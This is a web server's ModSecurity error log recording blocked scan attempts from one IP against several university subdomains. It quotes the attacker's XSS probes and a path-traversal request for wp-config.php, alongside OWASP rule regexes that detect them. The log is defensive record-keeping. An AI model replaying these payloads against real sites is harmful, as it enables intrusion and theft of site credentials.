[Tue Aug 29 11:51:47.549486 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1<script found within ARGS:error: 1<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/atmail/index.php/admin/index/"] [unique_id "ZO15Y8Co-f0AAAlUllYAAAA0"]
[Tue Aug 29 11:51:47.576659 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1<script found within ARGS:error: 1<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/atmail/index.php/admin/index/"] [unique_id "ZO15Y8Co-f0AAAnIljkAAAAV"]
[Tue Aug 29 11:51:47.603214 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1<script found within ARGS:error: 1<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/atmail/index.php/admin/index/"] [unique_id "ZO15Y8Co-f0AAAlUllgAAAA0"]
[Tue Aug 29 11:51:48.615931 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:src: <body onload=alert(1)>.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/wp-content/themes/ambience/thumb.php"] [unique_id "ZO15ZMCo-f0AAAni@7gAAAAU"]
[Tue Aug 29 11:51:48.619245 2023] [:error] [pid 2521] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dew_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:dew_file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php"] [unique_id "ZO15ZMCo-f0AAAnZfFMAAAAG"]
[Tue Aug 29 11:51:48.625158 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onload= found within ARGS:src: <body onload=alert(1)>.jpg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/themes/ambience/thumb.php"] [unique_id "ZO15ZMCo-f0AAAnIlj0AAAAV"]
[Tue Aug 29 11:51:48.631157 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onload= found within ARGS:src: <body onload=alert(1)>.jpg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/wp-content/themes/ambience/thumb.php"] [unique_id "ZO15ZMCo-f0AAAnkwcAAAAAY"]
[Tue Aug 29 11:51:48.637352 2023] [:error] [pid 2526] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1<script found within ARGS:error: 1<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/atmail/index.php/admin/index/"] [unique_id "ZO15ZMCo-f0AAAnepPIAAAAK"]
[Tue Aug 29 11:51:48.649490 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:src: <body onload=alert(1)>.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/themes/ambience/thumb.php"] [unique_id "ZO15ZMCo-f0AAAhoHRUAAAAl"]
[Tue Aug 29 11:51:48.664232 2023] [:error] [pid 2527] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onload= found within ARGS:src: <body onload=alert(1)>.jpg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/wp-content/themes/ambience/thumb.php"] [unique_id "ZO15ZMCo-f0AAAnf3mEAAAAM"]
[Tue Aug 29 11:51:48.685748 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dew_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:dew_file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php"] [unique_id "ZO15ZMCo-f0AAAn0GXAAAAAa"]
[Tue Aug 29 11:51:48.688907 2023] [:error] [pid 2521] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dew_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:dew_file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php"] [unique_id "ZO15ZMCo-f0AAAnZfFUAAAAG"]
[Tue Aug 29 11:51:48.750115 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dew_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:dew_file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php"] [unique_id "ZO15ZMCo-f0AAAnIlj8AAAAV"]
[Tue Aug 29 11:51:48.766383 2023] [:error] [pid 2526] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dew_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:dew_file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php"] [unique_id "ZO15ZMCo-f0AAAnepPUAAAAK"]
[Tue Aug 29 11:51:49.578472 2023] [:error] [pid 2534] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onload= found within ARGS:src: <body onload=alert(1)>.jpg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/wp-content/themes/ambience/thumb.php"] [unique_id "ZO15ZcCo-f0AAAnmT3kAAAAd"]
[Tue Aug 29 11:51:49.579538 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dew_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:dew_file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php"] [unique_id "ZO15ZcCo-f0AAAmQ-1gAAAAb"]
[Tue Aug 29 11:51:49.601055 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:msg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/error"] [unique_id "ZO15ZcCo-f0AAAmIbTEAAAAo"]
[Tue Aug 29 11:51:49.608479 2023] [:error] [pid 2521] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:quot;. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS_NAMES:quot;: quot;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/mahasiswa-prodi-informatika-universitas-langlangbuana-masuk-15-besar-nasional-program-bangkit-2022/"] [unique_id "ZO15ZcCo-f0AAAnZfFoAAAAG"]
[Tue Aug 29 11:51:50.688441 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:msg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/error"] [unique_id "ZO15ZsCo-f0AAAlUll8AAAA0"]
[Tue Aug 29 11:51:50.699023 2023] [:error] [pid 2502] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:msg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/error"] [unique_id "ZO15ZsCo-f0AAAnGkL0AAAAR"]
[Tue Aug 29 11:51:50.701887 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:msg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/error"] [unique_id "ZO15ZsCo-f0AAAmQ-1oAAAAb"]
[Tue Aug 29 11:51:50.704182 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:msg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/error"] [unique_id "ZO15ZsCo-f0AAAnd3BYAAAAI"]
[Tue Aug 29 11:51:50.732683 2023] [:error] [pid 2528] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:msg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/error"] [unique_id "ZO15ZsCo-f0AAAngCV8AAAAP"]
[Tue Aug 29 11:51:51.529730 2023] [:error] [pid 2538] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS_NAMES:user_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: user_password found within ARGS_NAMES:user_password: user_password"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/login/dologin"] [unique_id "ZO15Z8Co-f0AAAnqj8gAAAAC"]
[Tue Aug 29 11:51:51.563699 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS_NAMES:user_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: user_password found within ARGS_NAMES:user_password: user_password"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/login/dologin"] [unique_id "ZO15Z8Co-f0AAAnd3BoAAAAI"]
[Tue Aug 29 11:51:51.592613 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS_NAMES:user_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: user_password found within ARGS_NAMES:user_password: user_password"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/login/dologin"] [unique_id "ZO15Z8Co-f0AAAmQ-18AAAAb"]
